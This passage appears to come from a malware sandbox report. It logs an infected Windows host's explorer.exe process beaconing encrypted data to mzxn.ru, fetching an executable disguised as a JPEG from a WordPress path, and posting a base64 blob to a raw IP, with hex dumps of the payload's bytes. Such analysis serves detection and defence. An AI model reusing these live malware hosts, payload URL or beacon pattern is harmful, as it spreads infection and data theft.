                                                                              Server: nginx/1.26.0
                                                                              Date: Sat, 27 Jul 2024 12:55:28 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              36192.168.2.449861185.18.245.58802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jul 27, 2024 14:55:33.277208090 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://lybbhvahdtjryena.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 295
                                                                              Host: mzxn.ru
                                                                              Jul 27, 2024 14:55:33.277240992 CEST295OUTData Raw: 3b 6e 53 14 82 cd 1c 53 dc ac c4 07 70 77 08 cc 09 08 c1 90 1f 71 92 16 7b 7c 7b 90 49 c1 c4 63 e9 5e b4 5a 0f 69 22 6d 98 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5d 27 a2 8a
                                                                              Data Ascii: ;nSSpwq{|{Ic^Zi"m? 9Yt M@NA .[k,vu]'HUBTO?'{;m?zAm5BT=a@&J )cg#_BRbDt2TV=RRSEqu93G7
                                                                              Jul 27, 2024 14:55:34.224626064 CEST151INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sat, 27 Jul 2024 12:55:34 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              37192.168.2.449865185.18.245.58802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jul 27, 2024 14:55:38.342885017 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://pdbeoiobqtywre.net/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 362
                                                                              Host: mzxn.ru
                                                                              Jul 27, 2024 14:55:38.342919111 CEST362OUTData Raw: 3b 6e 53 14 82 cd 1c 53 dc ac c4 07 70 77 08 cc 09 08 c1 90 1f 71 92 16 7b 7c 7b 90 49 c1 c4 63 e9 5e b4 5a 0f 69 22 6d 98 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 66 2b c7 94
                                                                              Data Ascii: ;nSSpwq{|{Ic^Zi"m? 9Yt M@NA .[k,vuf+uw"j\1NobMxNs\v,A1@HS!9^k>\g6X62+Qadufr!63
                                                                              Jul 27, 2024 14:55:39.291167974 CEST151INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sat, 27 Jul 2024 12:55:39 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              38192.168.2.449869185.18.245.58802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jul 27, 2024 14:55:44.022171021 CEST276OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://htnaerjwhiw.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 132
                                                                              Host: mzxn.ru
                                                                              Jul 27, 2024 14:55:44.022250891 CEST132OUTData Raw: 3b 6e 53 14 82 cd 1c 53 dc ac c4 07 70 77 08 cc 09 08 c1 90 1f 71 92 16 7b 7c 7b 90 49 c1 c4 63 e9 5e b4 5a 0f 69 22 6d 98 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 6f 0d a4 b7
                                                                              Data Ascii: ;nSSpwq{|{Ic^Zi"m? 9Yt M@NA .[k,vuo}Nexz\x/;-Km q(Rx
                                                                              Jul 27, 2024 14:55:44.978344917 CEST151INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sat, 27 Jul 2024 12:55:44 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              39192.168.2.449872185.18.245.58802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jul 27, 2024 14:55:48.956005096 CEST276OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://bhwqpbeenxy.org/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 129
                                                                              Host: mzxn.ru
                                                                              Jul 27, 2024 14:55:48.956039906 CEST129OUTData Raw: 3b 6e 53 14 82 cd 1c 53 dc ac c4 07 70 77 08 cc 09 08 c1 90 1f 71 92 16 7b 7c 7b 90 49 c1 c4 63 e9 5e b4 5a 0f 69 22 6d 98 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5a 52 b4 e1
                                                                              Data Ascii: ;nSSpwq{|{Ic^Zi"m? 9Yt M@NA .[k,vuZRvxEuxo^/[m?;rU
                                                                              Jul 27, 2024 14:55:49.930624008 CEST151INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sat, 27 Jul 2024 12:55:49 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              40192.168.2.449876185.18.245.58802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jul 27, 2024 14:55:54.274959087 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://wdxtdkqyiajmua.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 197
                                                                              Host: mzxn.ru
                                                                              Jul 27, 2024 14:55:54.274981976 CEST197OUTData Raw: 3b 6e 53 14 82 cd 1c 53 dc ac c4 07 70 77 08 cc 09 08 c1 90 1f 71 92 16 7b 7c 7b 90 49 c1 c4 63 e9 5e b4 5a 0f 69 22 6d 98 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5d 5a ef e0
                                                                              Data Ascii: ;nSSpwq{|{Ic^Zi"m? 9Yt M@NA .[k,vu]ZUMEx~bM4 OUcP1v]u>@6PDL\A,PJ>-ifol
                                                                              Jul 27, 2024 14:55:55.195467949 CEST151INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sat, 27 Jul 2024 12:55:55 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              41192.168.2.449879185.18.245.58802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jul 27, 2024 14:55:59.520818949 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://ehjigvnhybkqlwa.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 282
                                                                              Host: mzxn.ru
                                                                              Jul 27, 2024 14:55:59.520832062 CEST282OUTData Raw: 3b 6e 53 14 82 cd 1c 53 dc ac c4 07 70 77 08 cc 09 08 c1 90 1f 71 92 16 7b 7c 7b 90 49 c1 c4 63 e9 5e b4 5a 0f 69 22 6d 98 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 40 5c ed e7
                                                                              Data Ascii: ;nSSpwq{|{Ic^Zi"m? 9Yt M@NA .[k,vu@\nZgm8TB}<~hvna3\Bb2>^Ni F<H3[@/DbS#_\gyK`1Uz]EK;<3
                                                                              Jul 27, 2024 14:56:00.468460083 CEST151INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sat, 27 Jul 2024 12:56:00 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              42192.168.2.449883185.18.245.58802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jul 27, 2024 14:56:05.269274950 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://odshsrqjavtmlfdu.net/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 261
                                                                              Host: mzxn.ru
                                                                              Jul 27, 2024 14:56:05.269290924 CEST261OUTData Raw: 3b 6e 53 14 82 cd 1c 53 dc ac c4 07 70 77 08 cc 09 08 c1 90 1f 71 92 16 7b 7c 7b 90 49 c1 c4 63 e9 5e b4 5a 0f 69 22 6d 98 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4a 42 c3 e0
                                                                              Data Ascii: ;nSSpwq{|{Ic^Zi"m? 9Yt M@NA .[k,vuJBm_fxppZGT=`L}U_:NuGY jW^,s3+OF3 Uh!2-?/TZR#^T#Wh8G
                                                                              Jul 27, 2024 14:56:06.222457886 CEST151INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sat, 27 Jul 2024 12:56:06 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              HTTPS Proxied Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.449755185.149.100.2424432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:53:07 UTC179OUTGET /wp-content/images/pic1.jpg HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Host: mussangroup.com
                                                                              2024-07-27 12:53:07 UTC452INHTTP/1.1 200 OK
                                                                              Connection: close
                                                                              cache-control: public, max-age=604800
                                                                              expires: Sat, 03 Aug 2024 12:53:06 GMT
                                                                              content-type: image/jpeg
                                                                              last-modified: Wed, 24 Jul 2024 11:31:45 GMT
                                                                              accept-ranges: bytes
                                                                              content-length: 11672576
                                                                              date: Sat, 27 Jul 2024 12:53:06 GMT
                                                                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                              2024-07-27 12:53:08 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 24 00 2c 49 00 00 18 b2 00 00 80 09 00 c0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 10 bc 00 00 04 00 00 a4 34 b2 00 02 00 60 81 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00
                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd.$,I@4`
                                                                              2024-07-27 12:53:08 UTC16384INData Raw: 49 3b 66 10 76 1d 55 48 89 e5 48 83 ec 18 48 8b 10 48 8b 48 08 48 89 d0 e8 a3 60 00 00 48 83 c4 18 5d c3 48 89 44 24 08 48 89 5c 24 10 e8 ee 67 06 00 48 8b 44 24 08 48 8b 5c 24 10 eb c2 cc cc 49 3b 66 10 0f 86 83 00 00 00 55 48 89 e5 48 83 ec 18 f3 0f 10 00 0f 57 c9 0f 2e c1 75 04 66 90 7b 4a 0f 2e c0 75 02 7b 33 48 89 5c 24 30 e8 cd 34 06 00 48 8b 4c 24 30 48 31 c8 48 b9 21 a6 56 6a a1 6e 75 00 48 31 c8 48 b9 bf 63 8f bb 6b ef 52 00 48 0f af c1 48 83 c4 18 5d c3 b9 04 00 00 00 e8 5a 85 06 00 48 83 c4 18 5d c3 48 b8 21 a6 56 6a a1 6e 75 00 48 31 d8 48 b9 bf 63 8f bb 6b ef 52 00 48 0f af c1 48 83 c4 18 5d c3 48 89 44 24 08 48 89 5c 24 10 e8 44 67 06 00 48 8b 44 24 08 48 8b 5c 24 10 e9 55 ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                              Data Ascii: I;fvUHHHHHH`H]HD$H\$gHD$H\$I;fUHHW.uf{J.u{3H\$04HL$0H1H!VjnuH1HckRHH]ZH]H!VjnuH1HckRHH]HD$H\$DgHD$H\$U
                                                                              2024-07-27 12:53:08 UTC16384INData Raw: e8 1b 2e 03 00 48 8d 05 0e df 65 00 bb 08 00 00 00 e8 8a 36 03 00 48 8b 44 24 18 0f 1f 44 00 00 e8 fb 34 03 00 e8 36 30 03 00 e8 51 2e 03 00 48 8b 44 24 30 48 8b 88 d8 00 00 00 48 89 4c 24 18 e8 db 2d 03 00 48 8d 05 d6 de 65 00 bb 08 00 00 00 e8 4a 36 03 00 48 8b 44 24 18 0f 1f 44 00 00 e8 bb 34 03 00 e8 f6 2f 03 00 e8 11 2e 03 00 48 8b 44 24 30 48 8b 88 e0 00 00 00 48 89 4c 24 18 e8 9b 2d 03 00 48 8d 05 9e de 65 00 bb 08 00 00 00 e8 0a 36 03 00 48 8b 44 24 18 0f 1f 44 00 00 e8 7b 34 03 00 e8 b6 2f 03 00 e8 d1 2d 03 00 48 8b 44 24 30 48 8b 88 e8 00 00 00 48 89 4c 24 18 e8 5b 2d 03 00 48 8d 05 66 de 65 00 bb 08 00 00 00 e8 ca 35 03 00 48 8b 44 24 18 0f 1f 44 00 00 e8 3b 34 03 00 e8 76 2f 03 00 e8 91 2d 03 00 48 8b 44 24 30 48 8b 88 f0 00 00 00 48 89 4c 24
                                                                              Data Ascii: .He6HD$D460Q.HD$0HHL$-HeJ6HD$D4/.HD$0HHL$-He6HD$D{4/-HD$0HHL$[-Hfe5HD$D;4v/-HD$0HHL$
                                                                              2024-07-27 12:53:08 UTC16384INData Raw: 48 c1 e3 10 48 89 ce 81 e1 ff ff 07 00 48 09 cb 48 89 d9 48 c1 fb 13 48 c1 e3 03 90 90 90 66 90 48 39 da 74 05 eb 23 48 89 f0 48 8b 18 48 89 1a 48 89 c6 48 89 d8 f0 48 0f b1 0e 0f 94 c3 66 90 84 db 74 e3 48 83 c4 30 5d c3 48 89 54 24 28 48 89 74 24 18 48 89 4c 24 10 48 89 5c 24 20 66 90 e8 bb ed 02 00 48 8d 05 4a 2d 67 00 bb 2c 00 00 00 e8 2a f6 02 00 48 8b 44 24 28 0f 1f 44 00 00 e8 9b f5 02 00 48 8d 05 68 87 65 00 bb 05 00 00 00 e8 0a f6 02 00 48 8b 44 24 18 0f 1f 44 00 00 e8 7b f4 02 00 48 8d 05 ce 9e 65 00 bb 08 00 00 00 e8 ea f5 02 00 48 8b 44 24 10 0f 1f 44 00 00 e8 5b f4 02 00 48 8d 05 44 a7 65 00 bb 09 00 00 00 e8 ca f5 02 00 48 8b 44 24 20 0f 1f 44 00 00 e8 3b f5 02 00 e8 76 ef 02 00 e8 91 ed 02 00 48 8d 05 45 ca 65 00 bb 0c 00 00 00 0f 1f 44 00
                                                                              Data Ascii: HHHHHHfH9t#HHHHHHftH0]HT$(Ht$HL$H\$ fHJ-g,*HD$(DHheHD$D{HeHD$D[HDeHD$ D;vHEeD
                                                                              2024-07-27 12:53:08 UTC16384INData Raw: 24 60 0f b7 7e 52 48 0f af cf 48 c1 e8 38 48 03 4b 10 3c 05 73 03 83 c0 05 48 89 4c 24 40 88 44 24 1f 48 89 ca eb 43 8b 50 54 0f ba e2 04 72 06 31 c0 31 db eb 0f 48 8b 40 30 48 89 cb 0f 1f 00 e8 9b 46 ff ff 48 85 c0 75 06 48 83 c4 50 5d c3 74 04 48 8b 40 08 e8 65 87 02 00 0f b7 7e 52 48 8d 3c 0f 48 8d 7f f8 48 8b 0f 48 85 c9 74 09 48 89 4c 24 48 31 ff eb 36 0f b6 4b 08 0f 1f 40 00 f6 c1 04 75 16 48 8d 05 25 fa 65 00 bb 15 00 00 00 e8 ca 93 02 00 48 8b 5c 24 68 0f b6 43 08 83 e0 fb 88 43 08 48 83 c4 50 5d c3 48 ff c7 48 83 ff 08 73 a7 44 0f b6 04 0f 44 38 c0 74 09 66 90 45 84 c0 75 e6 eb b1 48 89 7c 24 20 44 0f b6 46 50 4c 0f af c7 49 8d 0c 08 48 8d 49 08 44 8b 46 54 48 89 4c 24 38 41 0f ba e0 00 73 05 4c 8b 01 eb 03 49 89 c8 48 8b 4e 30 48 8b 51 18 48 8b
                                                                              Data Ascii: $`~RHH8HK<sHL$@D$HCPTr11H@0HFHuHP]tH@e~RH<HHHtHL$H16K@uH%eH\$hCCHP]HHsDD8tfEuH|$ DFPLIHIDFTHL$8AsLIHN0HQH
                                                                              2024-07-27 12:53:08 UTC16384INData Raw: 24 68 48 8b 11 48 8d 72 ff 48 89 31 48 83 fa 01 75 0d e8 29 35 05 00 48 8b 4c 24 68 89 41 0c 48 89 cb e9 8d fe ff ff 48 83 fa 08 73 65 41 84 01 41 c6 04 11 00 48 85 d2 75 0a 4d 39 d1 74 be 4c 89 d0 eb 29 48 ff ca 48 83 fa 08 73 10 41 84 01 42 0f b6 34 0a 40 80 fe 01 74 cc eb a0 48 89 d0 b9 08 00 00 00 e8 d6 8a 05 00 49 89 d2 0f b7 57 52 4c 89 d6 4a 8d 14 12 48 8d 52 f8 48 8b 12 90 49 39 d1 75 e5 49 89 c2 ba 07 00 00 00 49 89 f1 eb b5 48 89 d0 b9 08 00 00 00 e8 a1 8a 05 00 90 48 89 44 24 08 48 89 5c 24 10 48 89 4c 24 18 48 89 7c 24 20 e8 67 67 05 00 48 8b 44 24 08 48 8b 5c 24 10 48 8b 4c 24 18 48 8b 7c 24 20 e9 ce fc ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 76 5f 55 48 89 e5 48 83 ec 18 0f b6 53 08 0f b6 73 09 f6 c2 08 75 02 ff ce 48 89
                                                                              Data Ascii: $hHHrH1Hu)5HL$hAHHseAAHuM9tL)HHsAB4@tHIWRLJHRHI9uIIHHD$H\$HL$H|$ ggHD$H\$HL$H|$ I;fv_UHHSsuH
                                                                              2024-07-27 12:53:08 UTC16384INData Raw: 00 f2 0f 10 05 47 55 70 00 f2 0f 11 02 b8 01 00 00 00 eb 2c 48 81 c4 08 02 00 00 5d c3 4c 8b 0d 7c 61 ac 00 41 ff c0 45 0f b7 c0 0f 57 c0 f2 41 0f 2a c0 f2 41 0f 11 04 c1 48 ff c0 0f 1f 40 00 48 83 f8 44 7d 1f 48 8b 0d 5b 61 ac 00 48 8d 15 6c 3d 48 00 44 0f b7 04 42 48 39 c8 72 bf 66 90 e9 4d 17 00 00 48 8b 0d 44 61 ac 00 48 8b 1d 35 61 ac 00 48 ff c3 48 8b 05 23 61 ac 00 0f 1f 00 48 39 d9 73 3b bf 01 00 00 00 48 8d 35 2f 0e 57 00 e8 6a 75 03 00 48 89 0d 13 61 ac 00 83 3d 6c 0e b5 00 00 74 13 e8 d5 46 05 00 49 89 03 48 8b 0d eb 60 ac 00 49 89 4b 08 48 89 05 e0 60 ac 00 48 89 1d e1 60 ac 00 f2 0f 10 05 d1 55 70 00 f2 0f 11 44 d8 f8 e8 66 25 ff ff 48 89 1d e7 60 ac 00 48 89 0d e8 60 ac 00 83 3d 21 0e b5 00 00 74 13 e8 8a 46 05 00 49 89 03 48 8b 15 c0 60 ac
                                                                              Data Ascii: GUp,H]L|aAEWA*AH@HD}H[aHl=HDBH9rfMHDaH5aHH#aH9s;H5/WjuHa=ltFIH`IKH`H`UpDf%H`H`=!tFIH`
                                                                              2024-07-27 12:53:08 UTC16384INData Raw: 29 d1 ff c1 d1 e1 48 8d 15 77 c9 b4 00 f0 0f b1 0a 0f 94 c1 84 c9 74 c7 90 8b 05 15 37 ac 00 89 c1 81 e1 00 00 00 80 85 c9 75 21 8d 50 01 48 8d 35 ff 36 ac 00 f0 0f b1 16 0f 94 c2 0f 1f 40 00 84 d2 74 d4 8b 15 36 e9 ad 00 eb 06 8b 15 2e e9 ad 00 89 8c 24 a4 00 00 00 89 94 24 a0 00 00 00 0f b6 74 24 26 40 84 f6 74 04 85 c9 eb 14 85 c9 0f 85 f3 08 00 00 40 84 f6 74 0d 0f 1f 44 00 00 85 c9 0f 84 d0 08 00 00 44 0f 11 bc 24 78 01 00 00 c6 84 24 88 01 00 00 00 48 c7 84 24 90 01 00 00 00 00 00 00 48 8d 05 94 09 00 00 48 89 84 24 78 01 00 00 48 8b 84 24 a8 00 00 00 48 89 84 24 80 01 00 00 0f b6 44 24 3f 88 84 24 88 01 00 00 48 8b 84 24 30 01 00 00 48 89 84 24 90 01 00 00 48 8d 84 24 78 01 00 00 48 89 04 24 e8 0f e6 04 00 45 0f 57 ff 4c 8b 35 f4 cb b4 00 65 4d 8b
                                                                              Data Ascii: )Hwt7u!PH56@t6.$$t$&@t@tDD$x$H$HH$xH$H$D$?$H$0H$H$xH$EWL5eM
                                                                              2024-07-27 12:53:08 UTC16384INData Raw: df 48 8d b4 24 a0 00 00 00 bb 08 00 00 00 48 89 d0 e8 ca 0e 00 00 48 8b 84 24 30 01 00 00 48 8d 7c 24 40 48 8d 7f e0 48 89 6c 24 f0 48 8d 6c 24 f0 e8 f5 cd 04 00 48 8b 6d 00 48 c7 c3 ff ff ff ff 48 89 d9 48 89 cf 48 89 c6 45 31 c0 48 8d 44 24 40 e8 49 d2 03 00 e9 d5 00 00 00 0f 1f 40 00 83 fa 06 75 0b 31 c0 48 81 c4 20 01 00 00 5d c3 90 8b 88 90 00 00 00 89 c9 48 89 8c 24 08 01 00 00 48 8b 90 98 00 00 00 48 89 94 24 00 01 00 00 e8 8b ad 01 00 48 8d 05 23 8b 64 00 bb 0c 00 00 00 e8 fa b5 01 00 48 8b 84 24 30 01 00 00 e8 6d b5 01 00 48 8d 05 ce 55 64 00 bb 07 00 00 00 90 e8 db b5 01 00 48 8b 84 24 00 01 00 00 e8 0e b3 01 00 48 8d 05 62 df 64 00 bb 13 00 00 00 66 90 e8 bb b5 01 00 48 8b 84 24 08 01 00 00 e8 ee b2 01 00 e8 69 af 01 00 e8 84 ad 01 00 48 8d 05
                                                                              Data Ascii: H$HH$0H|$@HHl$Hl$HmHHHHE1HD$@I@u1H ]H$HH$H#dH$0mHUdH$HbdfH$iH
                                                                              2024-07-27 12:53:08 UTC16384INData Raw: eb be cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 0f 86 84 01 00 00 55 48 89 e5 48 83 ec 20 48 89 44 24 30 84 00 90 e8 21 82 fe ff 4c 89 f1 48 8b 44 24 30 48 39 48 08 0f 85 4b 01 00 00 90 e8 69 84 fe ff 0f 57 c0 31 c0 eb 06 0f 10 c1 48 89 c8 f2 0f 10 0d 2c 96 6f 00 66 0f 2e c8 0f 86 f0 00 00 00 f2 0f 11 44 24 18 48 89 44 24 10 48 8b 44 24 30 48 8b 90 90 00 00 00 48 8b 0a ff d1 84 c0 0f 85 bf 00 00 00 48 8b 4c 24 30 48 8b 91 88 00 00 00 48 8b 1a b8 00 00 01 00 ff d3 48 85 db 75 5e 48 8b 0d c4 49 b4 00 0f 1f 40 00 48 85 c9 0f 84 ce 00 00 00 48 89 c2 48 89 d3 31 d2 48 f7 f1 48 85 c0 7c 0a 0f 57 c9 f2 48 0f 2a c8 eb 18 48 89 c1 83 e0 01 48 d1 e9 48 09 c1 0f 57 c9 f2 48 0f 2a c9 f2 0f 58 c9 f2 0f 10 15
                                                                              Data Ascii: I;fUHH HD$0!LHD$0H9HKiW1H,of.D$HD$HD$0HHHL$0HHHu^HI@HHH1HH|WH*HHHWH*X


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.449756167.235.128.1534432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:53:16 UTC235OUTPOST / HTTP/1.1
                                                                              Host: 167.235.128.153
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 10591
                                                                              2024-07-27 12:53:16 UTC10591OUTData Raw: 65 75 4c 5a 4c 30 61 34 77 4f 52 39 45 50 54 38 43 41 32 73 64 66 70 4a 69 6d 49 78 53 4a 58 46 55 4e 69 6f 4f 72 44 71 30 53 73 43 6b 30 42 79 2b 53 39 61 68 48 43 4d 75 50 32 46 2f 41 70 61 78 38 43 50 64 4d 4b 55 4c 31 30 67 35 62 35 56 33 6b 34 59 4e 66 36 72 45 72 41 46 61 53 45 69 31 46 66 2b 57 35 48 52 66 59 74 31 6c 56 32 54 37 5a 75 39 62 70 4d 46 7a 54 69 41 4c 75 6b 4e 50 78 4c 38 30 71 7a 4b 66 67 30 6e 79 68 73 30 30 50 77 69 78 59 52 48 46 66 74 57 75 55 33 30 61 35 66 7a 31 32 44 6d 4e 5a 69 45 31 6f 30 6d 51 6e 76 33 35 55 73 31 6f 72 4d 32 36 34 54 34 45 53 53 76 57 42 66 63 4c 69 73 68 77 6d 59 69 31 5a 2b 5a 6e 56 6a 47 54 72 31 38 2b 6a 2b 5a 59 73 73 71 7a 61 42 49 58 59 6c 4e 74 39 58 50 56 76 64 7a 4c 69 38 76 2b 37 65 51 47 61 6b
                                                                              Data Ascii: euLZL0a4wOR9EPT8CA2sdfpJimIxSJXFUNioOrDq0SsCk0By+S9ahHCMuP2F/Apax8CPdMKUL10g5b5V3k4YNf6rErAFaSEi1Ff+W5HRfYt1lV2T7Zu9bpMFzTiALukNPxL80qzKfg0nyhs00PwixYRHFftWuU30a5fz12DmNZiE1o0mQnv35Us1orM264T4ESSvWBfcLishwmYi1Z+ZnVjGTr18+j+ZYssqzaBIXYlNt9XPVvdzLi8v+7eQGak
                                                                              2024-07-27 12:53:17 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 733
                                                                              Date: Sat, 27 Jul 2024 12:53:17 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
